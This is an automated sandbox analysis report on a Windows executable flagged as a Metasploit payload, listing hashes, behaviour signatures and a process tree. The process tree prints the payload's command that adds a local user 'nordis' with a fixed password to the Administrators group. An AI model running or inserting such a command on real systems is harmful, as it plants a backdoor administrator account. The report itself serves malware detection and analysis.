Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-09-2024 13:49

General

  • Target

    4f94ff7c69fcfdc3fa732ef0cf3b541542a6d14eed0966c8c36d59ebe13dc85aN.exe

  • Size

    72KB

  • MD5

    27341417b941924bb8ff6578097a4960

  • SHA1

    17ff8b228a3c2c34cbc01e49e37c68da4022915e

  • SHA256

    4f94ff7c69fcfdc3fa732ef0cf3b541542a6d14eed0966c8c36d59ebe13dc85a

  • SHA512

    91f42c36c6cb0a5292376044bfd07049e19eccff938dcc5a51b513801b984f7f3ec32efbb9d12048125d314e6aa8847e390fd206dbd683b08f59f64f1b90eec8

  • SSDEEP

    1536:IqrTnDchXNXBfIy3VtAjwqNRtFRLmTQMb+KR0Nc8QsJq39:XrTDQ9j3VOwqlFRLmEe0Nc8QsC9

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4f94ff7c69fcfdc3fa732ef0cf3b541542a6d14eed0966c8c36d59ebe13dc85aN.exe
    "C:\Users\Admin\AppData\Local\Temp\4f94ff7c69fcfdc3fa732ef0cf3b541542a6d14eed0966c8c36d59ebe13dc85aN.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c net user nordis Passw0rd1 /ADD && net localgroup Administrators nordis /ADD
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5108
      • C:\Windows\SysWOW64\net.exe
        net user nordis Passw0rd1 /ADD
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3672
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user nordis Passw0rd1 /ADD
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2776
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators nordis /ADD
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3156
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators nordis /ADD
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2016

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3592-0-0x0000000000560000-0x0000000000561000-memory.dmp

    Filesize

    4KB